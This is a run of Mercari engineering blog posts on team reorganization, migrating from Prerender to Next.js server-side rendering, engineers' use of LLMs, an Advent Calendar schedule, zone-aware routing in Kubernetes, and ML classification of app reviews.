The team is on its way to getting rid of that vicious cycle with the technical direction incorporated into the roadmap, integrating services, improving internal tools, and providing more flexibility to the engineers from other teams to use the platform autonomously. In fact, they have already been collecting positive results in that direction, as we will see in the next section.

The outcome

To put some numbers, we distribute, monthly, about 1.5 billion notifications to our users related to promotional content and over a hundred million financial incentives of different types.

There were a few system failures and issues, but the team always reacted promptly to recover and prevent them. Hundreds of campaigns utilize the platform monthly, and engineers provide support for the internal tools, or "weapons," as the product managers call them.

Mercard reached 2 million users in less than a year (news), and Mercoin reached 1 million users in 7 months (news); behind the innovative features, we have witnessed how Growth teams used the platform and tools to engage our users with well-designed campaigns launched at an incredible pace, achieving astonishing results.

Many other achievements didn’t hit the news but significantly contributed to the results: new types of coupons were introduced in the app; integration with LINE accounts to send notifications to users; an entirely new service for supporting the Loyalty Program was created from scratch; a new type of coupon for listers was introduced; and so much more.

EGP Pages, the landing pages editor implemented by the frontend engineers, became a "big hit," an internal success case, powering many of those campaigns. After merging the teams, Merpay services were also integrated – the Mercard example above being just one of them. At the moment of this writing, we have over 150 campaign landing pages live, with more than 40 million views per month.

It is also worth mentioning that a few unused services were decommissioned, and a few services unrelated to growth were already handed over. Having a strong sense of mission makes it easier for other teams to understand the boundaries, too. That confirms the Conway’s Law effect, but we are just starting to see it. There is much more to come from integrating a few services that were split before.

Coincidence or not, we have seen the consolidation of growth and marketing teams’ objectives across companies. The existence of a unified Growth Platform may have inspired that change. Or, at least, enabled it. Our team participates in the Growth All Hands, where all members across the companies working on the growth initiatives gather, and we have a dedicated slot to present the innovations we are introducing in the platform.

That is evidence of how much the growth leadership trusts the team and how it was an excellent choice to bring them to work closely together, All for One.

Summary

Engineering teams related to Growth were split into different companies. By trying to resolve a common problem, a collaboration started. Over time, they gathered into one company and became a unified Growth Platform. That boosted their productivity, which contributed directly to the growth of the entire group.

To make a smooth transition while transferring team members, expectations were aligned in advance, changes were introduced progressively, and leadership support played an essential role in keeping the team engaged.

It wasn’t an easy journey, but we have many good reasons to celebrate at our traditional year-end party!

References

If you are interested in Growth Platform, please check out many talks from the last Tech Fest and the blog posts related to our teams and systems:

Last but not least, I want to mention "How We Reorganize Microservices Platform Team" from the Platform Team (by @deeet), which is a source of inspiration and quite a handbook for similar organizational changes.

Tomorrow’s article will be by Shion. Look forward to it!

How We Saved 75% of our Server Costs

Sat, 02 Dec 2023 11:00:42 GMT

This post is for Day 02 of Mercari Advent Calendar 2023, brought to you by @pratik from the Mercari Web Platform team.

This article will explain how are we saving so much cost by migrating away from our Dynamic Rendering Service (aka Prerender) to Server Side Rendering (SSR) (aka Web Suruga SSR)

The migration project initially started as a FinOps Initiative to save cost but it turned out that Google is also not recommending Dynamic Rendering Solution for SEO anymore https://developers.google.com/search/docs/crawling-indexing/javascript/dynamic-rendering

Also this article will mainly focus on the infrastructure details of this migration. There was a Big SEO Impact & a lot of interesting challenges on the frontend side like why we chose Next.js SSR, etc. Mercari Web Architect team will be publishing an article about it tomorrow!!!

If you are curious about Prerender, My team member have written a wonderful article explaining how we implemented Prerender: https://engineering.mercari.com/en/blog/entry/20220119-implement-the-dynamic-rendering-service/

Prerender is used to serve only Bot’s Requests like Google bot (no user traffic) so, we have a rate-limit on prerender to make sure it doesn’t get spammed with requests

Technical Insights of Prerender Removal Process

This section will explain the process we went through & issues we faced when removing Prerender from Infrastructure Perspective

Load Testing

It is very important to have some SLO (Service Level Objective) in mind for your service, which helps in modifying the resources during Load Testing. This makes sure you are not just playing with the resource requests & limits when doing Load Testing.
The main SLO for Web Suruga SSR Service was p90 Latency always less than 500ms (spoiler, we ended up achieving ~350ms 🎉) (for Prerender the p90 Latency was ~2.7sec)

We Created Mock Server for API & Mock Deployment of Frontend to Perform the Load Test.
We chose not to do Load Test on the Dev environment because we have a very complicated dependency on multiple microservices so scaling up & down every microservice during Load Test is almost impossible.
We know this approach doesn’t replicate production well but in our case it worked out fine!

We used the loadtest npm package to run Load Test because it provides all the necessary features & it’s much stable!

We tried Hey & ab for Load Test but they did not meet our needs, we want to try k6.io in the future & see how it goes

Target URL:    [REDACTED]/search?keyword=%E6%9C%8D
Max requests:    180000
Concurrency level:    1
Agent:    keepalive
Requests per second:    [REDACTED]

Completed requests:    180000
Total errors:    0
Total time:    301.06053639600003 s
Requests per second:    [REDACTED]
Mean latency:    87.5 ms

Percentage of the requests served within a certain time
  50%      69 ms
  90%      148 ms
  95%      193 ms
  99%      301 ms
 100%      11590 ms (longest request)

We followed multiple combinations of strategies for doing Load Testing as follows,

Load Testing Strategy based on Pods

You start with the Single-Pod Load Test, Single-Pod Load Test is very straightforward, you just try to squeeze as much output as possible from 1 Pod while targeting SLOs & keeping the resources as low as possible.

Just multiply the number of pods based on the traffic one Pod was able to handle in proportion which will cover your target requests per second, and that will be the number of Pods you need.

It is also important to run proper Load Test when having multiple pods, as this lets us know if the traffic/load is distributed evenly between pods! (I like to call this Multi-Pod Load Test but its just an extension of Single-Pod Load Test 😅)

Load Testing Strategy based on Pages

Since every page (or URL) has a different set of apis, page size, etc. This results in different latency & resource requirements for each page.
So, it is very important to run Load Test on each page separately to get worst case data & also its important to run Load Test on multiple pages in-parallel to reflect Production traffic & get more realistic data!

Load Testing CPU Usage

Horizontal Pod Autoscaling (HPA)

Since the traffic from Bot fluctuates a lot, We don’t want to keep too many pods alive if they are serving very small traffic and vice-versa.

Bot Traffic Fluctuation

We have min & max values to make sure the deployment doesn’t reduce or increase the number of pods too much, eg

minReplicas: 2
maxReplicas: 100

We have a slow Scale Down & a fast Scale Up strategy mainly based on CPU Utilization, eg

scaleDown:
  policies:
    - periodSeconds: 90
      type: Percent
      value: 2

metrics:
    - resource:
        name: cpu
        target:
          averageUtilization: 80
          type: Utilization
      type: Resource

Monitoring

For Monitoring we use Datadog, and for Datadog APM (Tracing) we use the Datadog official dd-trace npm package.

Since we implemented Web Suruga SSR using Next.js, there is an issue with Next.js SSR that datadog tracing doesn’t work with the in-built Next.js Server

More Context here: https://github.com/vercel/next.js/discussions/16600

Considering our case, we decided to implement our own custom express server to fix the above issue. As this was the simplest & least time consuming solution.

const nextHandler = nextApp.getRequestHandler();

async function handler(req: Request, res: Response) {
  try {
      await nextHandler(req, res);
    } catch (err) {
      res.statusCode = 500;
      res.end('internal server error');
    }
}

const app = express();
app.all('*', handler);

Release Strategy

We followed a Gradual Release strategy like we started out with 1% of traffic migrated from Prerender to Web Suruga SSR, and then slowly migrated to 10%, 30%, and so forth.

We decided to do Page-by-Page release as it reduces some dependency from the frontend development, also There was a risk of providing inconsistent content to Google bot so, we had to make sure the gradual release didn’t take too long and having Page-by-Page release strategy really helped with that!

We used an HTTP Header to distribute requests between Prerender & Web Suruga SSR because using HTTP cookies requires lot of extra implementation and using Url Parameters can affect Google bot url rankings Also we are using Istio Ingress Gateway for routing & using HTTP Headers with it is really simple (spending too much time on this routing is not necessary since we need to remove it after whole migration)

if (randomint(0, 99) < 33) { # 33% Released
  set req.http.X-WEB-SURUGA-SSR = "true";
} else {
  set req.http.X-WEB-SURUGA-SSR = "false";
}

Impact & Conclusion

We were able to increase our rate-limit by 2x (to allow Googlebot to crawl more pages) while Saving our cost by more than 75%
We reduced the number of CPU Cores used by 96%, and Memory used by 60% in Total.

CPU & Memory Reduction

A Huge Shoutout to all the Members of Web Platform team and Web Architect team for their support on this project!
Through this project we learned a lot of things but mainly we realized, doing load testing is really Important & Tricky at the same time and since there are a lot of new projects regularly being tried out in Mercari, a lot of teams in our company need to do load testing regularly. So, we will be working on providing load testing tools internally within Mercari in Future!

If you are interested in Projects like this and interested in joining our team, we have an Open Position in our team, be sure to take a look https://apply.workable.com/mercari/j/6DC732B8FE/

Tomorrow’s article will be by Mercari Web Architect Team. Look forward to it!

The Bitter Lesson about Engineers in a ChatGPT World

Fri, 01 Dec 2023 11:00:39 GMT

This post is for Day 1 of Mercari Advent Calendar 2023, brought to you by Darren from the Mercari Data Engine team.

Tomorrow’s article will be by Pratik, about a huge cost saving engineering initiative. Looking forward to it!

It’s been over a year since ChatGPT was released and we asked the question on every engineer’s mind, Do We Need Engineers in a ChatGPT World?. In this post, we will follow up on last year’s discussion and talk about how the development of large language models (LLMs) has changed the trajectory of engineering.

First off, we’re still here! Engineers are still engineering, and there seems to be no slowdown, but rather an acceleration of activity. We need more humans than ever!

What happened? Why didn’t the LLMs take all our jobs yet?

In order to answer this question, it is useful to look backwards to the distant past of … 2019. In February of that year, GPT-2 was announced. It was a 1.5 billion parameter model that was able to generate fluent, coherent text from a simple auto-regressive completion pre-training regime. A month later, famed computer scientist Richard Sutton wrote a post titled “The Bitter Lesson” about his conclusions from looking at more than half a century of AI research. It states that “the biggest lesson that can be read from 70 years of AI research is that general methods that leverage computation are ultimately the most effective, and by a large margin.” The reason this lesson is “bitter” is that computer scientists often feel compelled to imbue systems with their own knowledge. But, over the long run, models that simply use a great deal of training data to learn the important patterns on their own almost always end up outperforming the hand coded systems.

In 2023, there are two big competing trends in the world of LLMs: the trend towards larger, more general models such as GPT-4, PaLM, LLaMA, etc., and the trend towards smaller specialized models. The Bitter Lesson tells us to prefer the more general methods. But the constraints of our current compute environment force us to use techniques such as LoRA to run large models more efficiently, or to simply go small from the beginning and train specialized models with fewer parameters.

Engineering is being pulled in similarly competing directions. On the one hand, engineers are being asked to understand more and more frameworks and systems just to do their jobs. This is thanks to software eating the world, but also to the massive rise in cloud computing over the past decade and a half. As a data engineer who also manages production systems, I might find myself looking at monitoring dashboards one minute, running kubectl the next, jumping to Airflow to check on some data pipelines, followed by running a massively distributed analytics job in BigQuery. These are only a handful of the myriad tools we use on any given day, but they were all originally built by different teams with different philosophies of software engineering. The different “language” of each framework is yet another layer of context switching for the already overloaded engineer.

The other direction engineers are being pulled in is specialization, just like LLMs. Each area of software engineering is a huge discipline, and no one is expected to be an expert in everything. Many engineers choose to specialize, whether it be in networking, iOS or Android development, graphics programming, or any of the many subfields of artificial intelligence. In each individual discipline, there are still new things to discover and build, and there are a wealth of careers available.

But what do we do now that code generation LLMs are increasingly reaching human level at coding tasks? Do we let LLMs specialize for us, while we stay general, or do we specialize and let the LLMs do the generic stuff?

To answer this, I would like to introduce another bitter lesson for engineers: it turns out that a lot of what we do in our jobs is intellectually not very novel. Not that it isn’t important or meaningful or creative, because it certainly can be, but rather, the vast majority of an engineer’s time is spent doing things other than making new intellectual discoveries. Likewise, autoregressive LLMs are not yet creating new intellectual discoveries, but rather have organized their training data in an extremely useful way that allows them to generate outputs similar to what they already know. How we choose to work with LLMs, since they are not going away, will define our future as engineers.

My advice is to turn this bitter lesson around and see it as a sweet relief: LLMs can handle the tasks we don’t want to do so we can focus our attention on the more meaningful pursuits. For me personally, I use LLMs to wade through tons of documentation that I don’t have time to peruse. Remember all the frameworks mentioned above? The grand total documentation for all the frameworks I use must be many millions of words (or tokens, for you LLMs). I have certainly not read it all. But LLMs are great for this use case, and I often use them for help finding methods and even sample code for frameworks that I only know part of. Sure, the language models often hallucinate methods that don’t exist (but should!), but they generally at least point me in the right direction. In information retrieval terms, the recall is high, but accuracy often suffers, meaning I can usually find what I want, even if there are a lot of irrelevant results. In fact, this particular use case of searching and summarizing large corpuses of text has led to a whole industry around Retrieval Augmented Generation, which essentially extends an LLM with a vector database to combine generative AI and information retrieval.

Another way I use LLMs is to learn the fundamentals of an engineering task I haven’t done before. Rather than giving access to an entire code base and telling an LLM to fix something for me, I would rather learn how to do it in the most basic way, and then use that knowledge to build the solution. This comes back to the probabilistic nature of LLMs – while they do a rather good job of generating human-level code, if you don’t even understand what you’re reading, how will you know if it’s a valid solution beyond whether the outputs are correct? This job of an engineer is increasingly important, and its analog in the world of AI is “explainability”. Of course, as systems grow more and more complex, the ability to understand all pieces becomes accordingly more challenging. But while arcane syntax is not necessarily important to memorize completely, and often quite difficult to do across dozens of languages, the overall structure of algorithms and system design absolutely need to be understood. The bitter lesson is, whether we’re training the next-gen LLM or transforming billions of rows into an aggregate, at the end of the day, we’re just trying to push bits through processors as fast as possible, and the basics apply just as well as before LLMs.

In Sutton’s “Bitter Lesson”, those who fight the trend towards larger data sets and more general methods end up overtaken by those who trust in the simplicity of their methods to discern complex patterns for themselves, and the availability of future compute to perform the training. Engineers have important takeaways from this lesson. We, too, should not place too much emphasis on the specialized knowledge we have accumulated over the years, especially the trivia, because LLMs already surpass us in those domains. Instead, we can focus on the general methods of engineering, because the first principles never change. Or we can push harder towards domain expertise by leveraging LLMs to take over the more mundane parts of our jobs. Either way, we consciously choose to co-evolve with LLMs, using them to effectively accelerate our role in engineering the future.

If you want to accelerate your career, check out our open positions at https://careers.mercari.com/.

Mercari Advent Calendar 2023 is coming up!

Fri, 24 Nov 2023 10:00:27 GMT

Hello! I’m @yasu_shiwaku of the Mercari Engineering Office.
We have our annual Advent Calendar blogathon event in December every year and we’ll be hosting it again this year!

We have both Mercari and Merpay/Mercoin Advent Calendar at the same time, so please check out Merpay/Mercoin side as well.

▶Merpay Advent Calendar 2023

What is the Advent Calendar?

The original meaning of Advent Calendar is "a calendar that counts down to Christmas". Based on this custom, Advent Calendar is a public blogging event where people post a blog every day from December 1 to 25.

We’ll be sharing our knowledge of the technologies used by our engineers at Mercari group. We hope this Advent Calendar will help you to enjoy the days leading up to Christmas.

Advent Calendars 2022

Publishing schedule

This is a collection of links to each article. I recommend bookmarking this page for the prompt update, and it will be very useful if you want to check it out at a later date.

Date	Theme / Title	Author
12/1	The Bitter Lesson about Engineers in a ChatGPT World	@darren
12/2	How We Saved 75% of our Server Costs	@pratik
12/3	How we reduced response latency by over 80%	@rclarey
12/4	Performance monitoring in Mercari mobile apps	@fp
12/5	The Spirit of Giving: A Year-End Roundup of Our Open Source Contributions	@adbutterfield
12/6	強いエンジニア組織に必要な、6つの技術以外のこと – メルカリ編 —	@t-hiroi
12/7	英語が苦手なエンジニアがメルカリに入ってどうなったか	@otter
12/8	t9n, i18n, l10n, g11n ?!	@wills
12/9	Gitブランチ戦略 Stacking手法のケーススタディ	@osari.k
12/10	In search of a knowledge management silver bullet	@rey
12/11	チームワークと効率向上のカギ！メルカリが成功する大人数iOS開発のための手法とは？	@sae
12/12	The art of streamlining mobile app releases	@fp
12/13	Leading a team of lead engineers	@fp
12/14	Current Microservices Status, Challenges, and the Golden Path	@ayman
12/15	BigQuery Unleashed: A Guide to Performance, Data Management and Cost Optimization	@sathiya
12/16	Closing the visual testing gap on Android with screenshot tests	@lukas
12/17	The new Mercari Master API	@cafxx
12/18 ①	The Frontend Infrastructure Monorepo	@jon
12/18 ②	Onboarding施策を成功させるポイント	@aisaka
12/19	Leveraging LLMs in Production: Looking Back, Going Forward	@andre
12/20	GCSのリソース最適化の取り組みで得た知見	@ayaneko
12/21	iOSDC2023で発表した「メルカリ10年間のiOS開発の歩み」のトークスクリプトを公開	@motokiee
12/22①	Making of "Your Mercari History"	@manoj
12/22②	LM-based query categorization for query understanding (JP)	@pakio
12/23①	メルカリの中長期技術投資プロジェクトRFS: 約2年の振り返り	@mtsuka
12/23②	Fine-Tuned CLIP: Better Listing Experience and 80% More Budget-Friendly	@andy971022
12/24	Renovate Web E2E tests with Playwright Runner	@jye
12/25	メルカリEngineering Roadmapの作成とその必要性	@kimuras

Please bookmark this article and check it out when you want to read it or follow the official Mercari Developers Twitter @MercariDev so you can be aware of article publication notifications!

We’re looking forward to bringing you some interesting technology stories in the last month of 2023! I hope you’re looking forward to the Advent Calendar!

Reducing Inter-Zone Egress Costs with Zone-Aware Routing in Mercari’s Kubernetes Clusters

Mon, 30 Oct 2023 10:40:37 GMT

Introduction

This summer, I had the opportunity to join Mercari’s Network Team as an intern, focusing on reducing network costs, especially inter-zone egress costs within our Kubernetes clusters. In this blog post, I aim to outline the problem we faced, the steps we took to solve it, and the promising results we’ve seen so far.

The Problem: High Inter-Zone Egress Costs

Mercari’s microservices are all running on Kubernetes clusters, specifically on Google Kubernetes Engine (GKE). We have Production and Development clusters spanning across three different Availability Zones (AZs) in the Tokyo region. The use of multiple AZs enhances our system’s fault tolerance, ensuring that even if one zone experiences issues, our services can continue to operate smoothly.

However, this architectural choice comes with its own challenges. Incoming network traffic to our services would be evenly distributed across Pods, irrespective of the AZ they were in. While this approach provides redundancy and high availability, it also incurred high costs for Mercari. Data transfer between different AZs comes with a financial cost, significantly impacting our Production environment.

The Solution: Zone-Aware Routing

Zone-Aware Routing is a strategy designed to optimize network costs and latency by directing traffic to services within the same Availability Zone whenever possible. This minimizes the need for inter-zone data transfer, thus reducing associated costs.

Zone-Aware Routing Solution

During my internship, we had the goal of enabling zone-aware routing.
There were two features available to achieve this:

Locality Load Balancing in Istio for services with Istio.
Topology Aware Routing for services using Kubernetes’ Kube-Proxy.

Istio is a service mesh for managing and securing microservices.. Mercari is in the process of adopting Istio, so we have a combination of services that do and do not use Istio. The choice between Istio’s Locality Load Balancing and Kubernetes’ Topology Aware Routing is determined by whether the service uses Istio. If the Pod communicating has an Istio sidecar, then Istio’s Locality Load Balancing will be utilized. If the Pod does not have an Istio sidecar, then Kubernetes’ Topology Aware Routing will be used.

Both Topology Aware Routing and Locality Load Balancing are mutually exclusive in their conditions for activation. If a Pod has an Istio Proxy inserted, only Locality Load Balancing will be used, and vice versa.

For Services Using Istio

Mercari utilizes Istio for its service mesh architecture. Istio comes with its own proxy and offers features like Service Discovery, Security, and Observability. To enable zone-aware routing, we adjusted the DestinationRule in Istio to include loadBalancer and outlierDetection configurations. The loadBalancer configuration is for setting how the zone-aware routing should be configured, and the outlierDetection is for determining when a zone should be seen as in failure to migrate to a different zone.

Here is an example of the DestinationRule:

apiVersion: networking.istio.io/v1beta1
kind: DestinationRule
metadata:
  name: echo
spec:
  host: echo.sample.svc.cluster.local
  trafficPolicy:
    loadBalancer:
      localityLbSetting:
        enabled: true
        failoverPriority:
         - "topology.kubernetes.io/region"
         - "topology.kubernetes.io/zone"
    outlierDetection:
      # configure based on usual 5xx error rate of service
      consecutive5xxErrors: 10
      # configure based on the time taken to run up a new Pod usually.
      interval: 5m
      # configure based on HPA target utilization
      maxEjectionPercent: 15%
      # configure based on HPA target utilization
      baseEjectionTime: 10m

For Services Using Kube-Proxy

For services that rely on kube-proxy, we used Kubernetes’ Topology Aware Routing. This feature prioritizes routing to Pods within the same topology (region, AZ, etc.). Implementing it is as simple as adding an annotation: service.kubernetes.io/topology-mode: Auto. More Details

Here is an example:

apiVersion: v1
kind: Service
metadata:
  name: http-server
  annotations:
    service.kubernetes.io/topology-mode: "auto"

Handling Imbalanced Traffic

Zone-aware routing, while effective in reducing inter-zone costs, introduces its own set of challenges. One significant challenge is imbalanced traffic distribution across Pods in different zones. This discrepancy can cause localized overload or underutilization, affecting the system’s overall efficiency and potentially incurring additional costs.

Below is a simple example with two services sending and receiving requests across two zones. Before Zone-Aware routing is enabled default round-robin request behavior is used and each instance of service 2 is going to get roughly 50% of the requests. However with Zone-Aware routing enabled for this service, one instance gets most of the requests(about 2/3 of all requests) while the other instance only gets 1/3. This creates an unfair workload, and the benefits of using Zone-Aware routing could be lost because of this imbalance.

Example: Before zone-aware routing enabled

Example: After zone-aware routing enabled

Some of our services need to operate in specific zones. For these services, we have specialized NodePools configured with Kubernetes taints to ensure that only Pods for those particular services are scheduled there. This setup introduces an inherent imbalance in the number of Nodes across different zones.

To mitigate this, we initially considered using GKE’s location_policy: BALANCED to even out the Node count across zones. However, this policy doesn’t guarantee an always balanced distribution and doesn’t consider zones during scale-down operations, which can further exacerbate the imbalance.

Additionally, the Horizontal Pod Autoscaler (HPA) generally monitors Pods across all zones, considering their overall utilization. As a result, even if a specific zone is under heavy load, it may not trigger a scale-up if the utilization is low in other zones.

Our solution was to set up individual Deployments and HPAs for each zone, allowing for independent scaling based on the traffic within that zone. This ensures that even if traffic is concentrated in a specific zone, it will be adequately scaled to handle the load. We also created an individual PodDisruptionBudget (PDB) to limit the number of concurrent disruptions for each zone.

How we created Deployments and HPA for each zone

Choosing targets for trials

Selecting where to implement these changes was based on data-driven decisions. We operate in a multi-tenant Kubernetes (k8s) cluster, with multiple services in multiple namespaces. For our metrics, we used Google Cloud Metrics, specifically pod_flow/egress_bytes_count, to understand the volume of traffic between namespaces in this multi-tenant environment. This helped us identify high-traffic service-to-service communications that could benefit most from these adjustments.

Technical Configurations

At Mercari, we operate multiple services, requiring a multi-tenant k8s cluster. In a complex ecosystem like this, managing Kubernetes configurations often turns into a labor-intensive task filled with writing multiple long manifests. This is where k8s-kit mercari’s internal CUE-based abstraction of Kubernetes manifests comes into play, significantly streamlining the process.

k8s-kit is a tool designed to streamline Kubernetes configurations. It minimizes the need for manual setup and repetitive tasks, allowing developers to focus more on the logic and features of their services. The tool accomplishes this by offering various levels of abstraction, which simplify the deployment processes. Under the hood, k8s-kit uses CUE, a powerful language that aids in defining, generating, and validating data structures.
If you want to know more about k8s-kit check out our blog post: Kubernetes Configuration Management with CUE

To enable zone-aware routing we used k8s-kit to configure individual Deployments and HPAs for each zone, an important step that enabled us to implement zone-aware routing effectively. By significantly reducing the manual configuration workload, k8s-kit made it simple to set up this complex, yet crucial, feature.

The Outcome

Kubernetes’ Topology Aware Routing

We experimented with Kubernetes’ Topology Aware Routing in one of our services that use kube-proxy and observed excellent results. Traffic from the gateway now predominantly goes to the same zone’s pods. Below is how much traffic each pod in zone-b gets from each zone. Initially, Pods in zone-b used to receive equal amounts of traffic from zones A, B, and C. Now, we see significantly more traffic coming from zone B and less from A and C.

How much traffic each pod in zone-b gets from each zone.

Istios’ Locality Load Balancing

Initially, we had difficulty getting Locality Load Balancing to work in our development cluster. Even with the Locality Load Balancing setting the traffic was distributed evenly through the zones and not for each zone.
We were able to confirm that Istios’ Locality Load Balancing worked in the same cluster with HTTP connections. However it did not work in the namespace of the target application using gRPC. We are still doing the investigation to learn why it was not working.

Future Plans

Our experience with zone-aware routing has been promising, but there’s room for both improvement and automation. Going forward, we aim to enhance operational simplicity and streamline the management of multiple HPAs and Deployments across different zones. Our strategy involves configuring k8s-kit to make zone-aware routing more straightforward for service developers, with a focus on automating these processes.
Below is an example of how we hope to add zone-aware routing configuration to the k8s-kit

App: kit.#Application & {
        metadata: {
                serviceID: “sample-service”
                name:       “echo”
        }

        spec: {
                image: “sample-service”
                Network: {
                    # Add a configuration for k8s-kit to automatically make the zone-aware routing configurations and create HPA and Deployments.
                    routingRule: zoneAwareRouting: {} 
                }
        }
}

Challenges and Learnings

This internship served as a significant learning opportunity for me, especially since it was my first time diving into several new technologies and methodologies. Below are some of the key challenges and learnings I gained from this experience:

Kubernetes: Understanding its complex orchestration capabilities and learning how to configure deployments and services were enlightening.
Datadog: Leveraging it for metrics enabled me to gauge the effectiveness of our changes in real-time.
Spinnaker: Utilizing this continuous delivery platform to deploy changes taught me the importance of automation in DevOps practices.
k8s-kit: Mercari’s internal tool introduced me to best practices in Kubernetes deployments with varying levels of abstraction.

The journey wasn’t smooth sailing all the way. One of the most challenging parts was dealing with Istio’s Locality Load Balancing feature not working as expected in the development environment. The frustration mounted as we scoured through logs, configurations, and community forums without arriving at a root cause.

Conclusion

The project focused on reducing Mercari’s inter-zone egress costs within our Kubernetes clusters has shown promising outcomes. By implementing zone-aware routing strategies, we effectively minimized traffic across different Availability Zones, thereby reducing the associated costs.

I’m thrilled to have been a part of this project. I believe the experience and insights I’ve gained will be invaluable in my future endeavors.

In addition to the topics discussed here, Mercari’s Platform Team is also involved in various exciting projects like:

In-house CI/CD infrastructure development
Developing layers of abstraction for developers
Networking domains like Istio

If you find these challenges intriguing and want to be part of Mercari’s Platform Team, we’re actively looking for people to join us!
Engineer, Platform

Thank you for reading, and stay tuned for more updates from Mercari’s Network Team!

Putting the Voice of Customers into the Software Development Process

Tue, 17 Oct 2023 17:08:36 GMT

Introduction

Every day, a vast amount of users open the App Store or the Google Play Store to leave ratings and reviews about the Mercari application. They generously provide insights into what they like and dislike, what they find valuable, and what they do not. At Mercari, our mission is to "circulate all forms of value to unleash the potential in all people."

User feedback in the form of app reviews is an invaluable connection between our customers and us. Incorporating this feedback into our development process allows us to unleash the full potential of our application and make it even more valuable to our users, which truly resonates with our mission.

Millions of users access our application daily, and chances are, you are one of them! Our users employ a wide range of devices, operating systems, and varying conditions when utilizing the Mercari mobile application (other open apps, available RAM memory, battery saving mode, phone configuration options, and many others).

Conducting comprehensive testing under all these circumstances is realistically impossible. While we can leverage the power of logs to understand user behavior and identify crashes, user feedback in the form of reviews provides a more profound insight. These reviews tell the stories of people who use and experience our application, sometimes sharing their positive experiences, and at times, encountering difficulties.

As QA Engineers and Managers, anything related to user value is of great interest to us. After all, quality can be defined as "Value to Some Person." In many cases, our users personify that definition. This is why, as a QA team, we have taken the initiative to integrate user feedback into our development process. Guided by the culture at Mercari, we have collaborated with various teams in order to build a process where everyone can harness the immense treasure trove that lies within Mercari’s application user reviews.

The end result is a process where we leverage ML to analyze, week by week, all reviews given to our app in the Google Play Store and App Store. The summarization and extraction of information improved cross functional communication between our teams, with the combined goals of addressing issues and considering improvements reported by our users, as well as constantly learning what is in the mind of our users and what they value of our products and services.

Previous Experience

One recent instance where user feedback took a protagonistic role on our software development process was on the run up to the launch of Mercari’s new application in 2022, code-named GU, short for "Ground Up". GU was more than just an update; it was a complete overhaul of the application. If you’re curious about the whole experience, be sure to check out our article below on the GU application development.

Recognizing the importance of involving our users in the development process, we knew that the success of the new app launch hinged on their collaboration. With a diverse range of devices, operating systems, configurations, and conditions, our users offered invaluable perspectives that we couldn’t simulate in-house.

To facilitate this communication, we launched volunteer-based beta programs on the App Store and Google Play Store, giving iOS and Android users the opportunity to try out the new application as soon as we had the new version of the app to a certain level of maturity. Users could share their feedback through a dedicated in-app feedback form.

What happened next exceeded our expectations. We were overwhelmed with the sheer volume of feedback from our users, presenting us with the challenge of sorting and categorizing the data into actionable information for our teams. Our software engineers were busy typing away at their keyboards, focusing on delivering our new version as fast as they could, making it impossible to invest in building an automated system to analyze user feedback. Instead, we had no choice but to tackle this task manually.

As a joint effort between our Voice of Customer (VoC) and QA Engineering teams, analyzing the feedback proved to be a complex task. We faced challenges such as identifying duplicate feedback, language barriers, effectively communicating the feedback to the right teams, and keeping up with the daily influx of feedback. It consumed a significant amount of our time. However, our efforts paid off. Not only did we uncover a fair share of hard to reproduce issues on the app, but we were also able to prioritize our tasks based on the quantity of reports received from users on specific topics.

It’s no exaggeration to say that the success of the app launch was partly attributed to the incredible Mercari users who generously shared their feedback. We were able to address problems, compatibility glitches with other apps, crashes, and even gather improvement suggestions. By taking their feedback into account, we avoided the chaos of encountering all of these issues on launch day.

Just imagine the turmoil that would have ensued if all users experienced these problems simultaneously! Thanks to the continuous iterative approach of listening to feedback and making necessary improvements, we seamlessly transitioned users into the new GU app. At a company level, we learned a valuable lesson about the immeasurable value of user feedback.

Hack Fest Project

After successfully launching the GU program and wrapping up Beta testing, I felt something was off with this user feedback channel shutting down. Though analyzing it was time-consuming, it provided valuable insight to our team. Instead of focusing less on this, I wondered if we could process more feedback with a more streamlined approach. To scale effectively, we needed to automate feedback categorization.

Initial slide of the presentation of our Hack Fest project: Feedback Classification (should have gone with a fancier name)

To gain traction on this notion, I pitched the idea on the ML Engineering Slack channel. Much to my delight, some colleagues showed keen interest, and one ML engineer named Paul Willot went further by becoming committed to making this a reality. Concurrently, I also discussed potential data sources with our Customer Support team and found support there as well, with Kazue Kudo san from their team deciding to champion things from the VoC side.

In the lead-up to our bi-annual Hack Fest event, a 3-day coding marathon open to all employees, we began shaping the framework of our project. With other new members, who jumped on board at the last minute, our objective was to build a minimum viable product (MVP) – an API that could autonomously categorize user feedback.

The initial step was to determine suitable categories for feedback. A balance between broad and overly detailed categories would need to be struck. We eventually settled on eight categories, after initially considering more than ten and doing fine tuning over them.

Next was the challenge of training our model. The estimate was that we would need approximately 100 reviews per category to showcase the model’s effectiveness. Combining our efforts, we managed to manually classify sufficient reviews across all categories, hopefully for the last time.

As the Hack Fest was drawing to a close, our ML engineer readied the model and prepared a proof of concept (PoC) site. Despite time constraints, we presented the working model and its potential benefits to our processes. Our project was well-received, even bagging a Special Mention from one of the judges (Maekawa Miho-san). However, we realized that this success marked merely the beginning of a greater journey towards fully implementing user feedback into our software development process.

If you are interested about Hack Fest and Mercari Culture, check out this related article: https://engineering.mercari.com/en/blog/entry/20230410-b286fe9577/

Template of the reports shared in Slack. This one breaks down the feedback in different categories for teams to work on. Monthly, we would share some graphs as well.

In the following months, our model filtered user feedback related to bugs or improvements, assisting in compiling weekly reports. This helped us to quickly evaluate weekly feedback by diving into the reviews that were classified as the categories we cared about the most. We picked out the topics most mentioned by our users and prioritized investigations on them. We also helped prioritize existing tickets with this information. Additionally, we collected improvements laid out by our users to enhance the capabilities of our apps. User input became an essential part of our development process, helping us detect issues and fine-tune features. While we acknowledged the potential to do more with this invaluable tool, we also identified some limitations and areas for future improvements.

Getting Real

Despite the positive response we received from our weekly reports, there were evident gaps in our process. But, in the spirit of innovation and continuous improvement, we recognized this as an opportunity to refine our approach.

One key issue was that stakeholders had limited access to the raw reviews. To address their queries, we had to manually sift through the reports, an exercise that was far from efficient. Similarly, recurrent albeit less common feedback often got overlooked due to its sparse occurrence in our weekly reports. Moreover, our process lacked instant, visually appealing data presentations like graphs, timelines or charts to help quickly comprehend the story behind numbers. Lastly, our not yet mature process had a tendency of duplicating data unnecessarily, a clear area for improvement.

Keen to tackle these pain points, we decided to revolutionize our weekly feedback reports. Our vision was to create an interactive dashboard that allowed stakeholders to access, filter, search, and analyze user feedback data as per their needs. We believed this would help unleash not just the potential of user data but also our team’s innovative thinking.

